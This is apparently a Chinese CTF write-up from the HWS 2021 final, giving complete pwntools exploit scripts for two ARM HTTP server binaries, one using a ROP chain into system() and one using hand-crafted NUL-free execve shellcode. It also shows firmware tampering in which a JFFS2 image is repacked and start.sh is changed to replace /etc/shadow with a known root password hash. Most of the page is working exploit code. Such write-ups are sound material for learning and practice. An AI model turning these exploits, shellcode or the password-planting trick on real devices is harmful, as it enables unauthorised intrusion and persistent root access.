HWS 2021 结营赛 Pwn
source link: https://xuanxuanblingbling.github.io/ctf/pwn/2021/03/06/hws/
HWS 2021 结营赛 Pwn
发表于 2021-03-06
| 分类于 CTF/Pwn
更新中…结营赛还有非常多值得探索的东西
Pwn1: easyserver
利用后在开发板的串口上查看命令输出（结果不会回传到 socket）
from pwn import *
#context.log_level = 'debug'
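# Target and addresses for the easyserver binary, as given in the writeup.
# The binary is not reproduced on this page, so they cannot be re-derived here.
HOST, PORT = '20.21.2.27', 59816
POP_R0_PC = 0x0006099c   # gadget: pop {r0, pc}
CMD_BASE = 0x008ACE4     # where the server's copy of the request line lands
SYSTEM = 0x00019158      # system()
CMD = b'cat /tmp/207775d1ee9b9efa245fd9fb6fc03b68/flag'


def build_payload(cmd, pop_r0_pc=POP_R0_PC, cmd_base=CMD_BASE, system=SYSTEM,
                  overflow_len=1100, cmd_offset=13, tail=b'b' * 100):
    """Build the easyserver overflow request as bytes.

    Layout: a request line carrying ``cmd`` (the string system() will run),
    ``overflow_len`` filler bytes up to the saved return address, a three-word
    ARM ROP chain ``pop {r0, pc}`` -> r0 = cmd_base + cmd_offset -> system(),
    then ``tail`` padding and the blank lines that end the HTTP request.

    ``cmd_offset`` selects where inside the copied request line r0 points;
    13 is the value the writeup uses (presumably skipping the method/path
    prefix in the server's copy of the line -- confirm against the binary).

    Returns bytes throughout so it also works with Python 3 pwntools, where
    mixing str and the bytes returned by p32() raises TypeError.
    """
    import struct

    if isinstance(cmd, str):
        cmd = cmd.encode()

    def p32(value):
        # little-endian 32-bit, what pwntools' p32 yields for ARM
        return struct.pack('<I', value)

    payload = b'POST ./ HTTP1.1;' + cmd + b'; \r\n'
    payload += b'a' * overflow_len
    payload += p32(pop_r0_pc) + p32(cmd_base + cmd_offset) + p32(system)
    payload += tail + b'\r\n\r\n\r\n'
    return payload


if __name__ == '__main__':
    p = remote(HOST, PORT)
    # cyclic(100) is pwntools' de Bruijn filler; any non-NUL padding would do.
    payload = build_payload(CMD, tail=cyclic(100))
    print(payload)
    p.send(payload)
    p.interactive()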
Pwn3: babyhttpd
利用后在开发板的串口上查看命令输出（结果不会回传到 socket）
from pwn import *
#context.log_level = 'debug'
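HOST, PORT = '20.21.2.27', 5000
RET_ADDR = 0x22504     # overwrites the saved return address; presumably something
                       # that transfers control into the request buffer holding the
                       # shellcode -- not derivable from this page
OVERFLOW_LEN = 655     # bytes of the `name=` value before the saved return address

# Earlier variant, kept for reference: same construction but runs /bin/ls with
# argv[1] = "/tmp" (r4 = string+8, NUL bytes written at +4 and +7 instead of
# +25 and +8 below).
# shellcode = asm('''
# add r4, pc, #56
# str r4, [sp, #8]
# sub r2, r2, r2
# strb r2, [r4, #4]
# sub r2, r2, r2
# add r3, pc, #28
# str r3, [sp, #4]
# str r2, [sp, #12]
# mov r0, r3, lsl r2
# strb r2, [r3, #7]
# add r3, pc, #4
# add r1, sp, #4
# strb r2, [r3, #1]
# swi 0x90ff0b
# ''')+'/bin/ls//tmp'

# NUL-free ARM (OABI) execve("/bin/cat", ["/bin/cat", "/tmp/ffffffllllaaaaaagggg"], NULL).
# With pc = current instruction + 8 and 14 instructions (56 bytes) ahead of the
# string constant appended below:
#   add r4, pc, #60    -> r4 = 68 = string+12, i.e. "/tmp/ffffffllllaaaaaagggg"
#   str r4, [sp, #8]   -> argv[1]
#   sub r2, r2, r2     -> r2 = 0 without a 00 byte in the encoding (also envp)
#   strb r2, [r4, #25] -> NUL-terminate argv[1] (25 characters)
#   add r3, pc, #28    -> r3 = 56 = start of "/bin/cat/////tmp/..."
#   str r3, [sp, #4]   -> argv[0]
#   str r2, [sp, #12]  -> argv[2] = NULL
#   mov r0, r3, lsl r2 -> r0 = r3 (filename); the register-shift form avoids the
#                         00 byte a plain `mov r0, r3` would encode
#   strb r2, [r3, #8]  -> NUL after "/bin/cat", ending filename and argv[0]
#   add r3, pc, #4     -> r3 = 52 = address of the swi instruction
#   add r1, sp, #4     -> r1 = argv
#   strb r2, [r3, #1]  -> patches swi 0x90ff0b into swi 0x90000b (OABI execve,
#                         syscall 11); the 0xff placeholder keeps the immediate
#                         NUL-free until runtime
#   swi 0x90ff0b
# The code writes into its own instruction stream and into the string, so the
# buffer it lands in must be both writable and executable.
SHELLCODE_ASM = '''
add r4, pc, #60
str r4, [sp, #8]
sub r2, r2, r2
strb r2, [r4, #25]
sub r2, r2, r2
add r3, pc, #28
str r3, [sp, #4]
str r2, [sp, #12]
mov r0, r3, lsl r2
strb r2, [r3, #8]
add r3, pc, #4
add r1, sp, #4
strb r2, [r3, #1]
swi 0x90ff0b
'''
SHELLCODE_STRINGS = b'/bin/cat/////tmp/ffffffllllaaaaaagggg'


def build_payload(shellcode, ret_addr=RET_ADDR, overflow_len=OVERFLOW_LEN):
    """Assemble the babyhttpd request as bytes.

    The shellcode rides in the request path (after six 0x11 bytes, as in the
    writeup -- their role is not explained on this page); the ``name=`` form
    field overflows ``overflow_len`` bytes and then overwrites the saved return
    address with ``ret_addr`` (little-endian, as p32 on ARM).

    Returns bytes so it also works with Python 3 pwntools, where asm() yields
    bytes and concatenating it with str raises TypeError.
    """
    import struct

    request_line = b'POST /' + b'\x11' * 6 + shellcode + b'\r\n\r\n'
    body = b'name=' + b'a' * overflow_len + struct.pack('<I', ret_addr) + b'&bbb=./;'
    return request_line + body


if __name__ == '__main__':
    context(arch='arm')
    shellcode = asm(SHELLCODE_ASM) + SHELLCODE_STRINGS
    p = remote(HOST, PORT)
    p.send(build_payload(shellcode))
    p.interactive()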
板子拿shell
jffs2解包
# Install jefferson to extract JFFS2 file systems
# (jefferson depends on cstruct; both steps below install into the system
# Python as root -- running setup.py from a freshly cloned repository under
# sudo executes its code as root, so a virtualenv is the safer place for it)
$ sudo pip install cstruct
$ git clone https://github.com/sviehb/jefferson
$ (cd jefferson && sudo python setup.py install)
# -e extracts, -M recurses into what was extracted; with jefferson on PATH
# binwalk hands the JFFS2 partition to it, producing the filesystem tree that
# is modified and repacked below
binwalk -Me test.img
jffs2打包
# mtd-utils provides mkfs.jffs2
sudo apt install mtd-utils
# repack the (modified) tree under rootfs/ into a JFFS2 image; endianness and
# eraseblock size are left at their defaults -- if the board rejects the image,
# match them to the original partition (-l/-b and -e)
mkfs.jffs2 -r rootfs -o rootfs.img
修改start.sh
#!/bin/sh
# Added to the board's start.sh to give root a known password without editing
# /etc in the flash image itself: copy /etc to /tmp, replace shadow there with a
# single root entry (MD5-crypt, "$1$"; the plaintext is the author's and is not
# given on this page), then mount the copy over /etc so logins read it.
cp -r /etc /tmp/
echo 'root:$1$NqxdI63c$nzvMkcJxzktGW6Tsgw3jb0:1::::::' > /tmp/etc/shadow
# NOTE(review): "-o loop" is meant for image files on GNU mount; a directory is
# normally bind-mounted ("mount -o bind /tmp/etc /etc"). Presumably the board's
# mount implementation accepts this form -- verify on the target before relying
# on it.
mount -o loop /tmp/etc/ /etc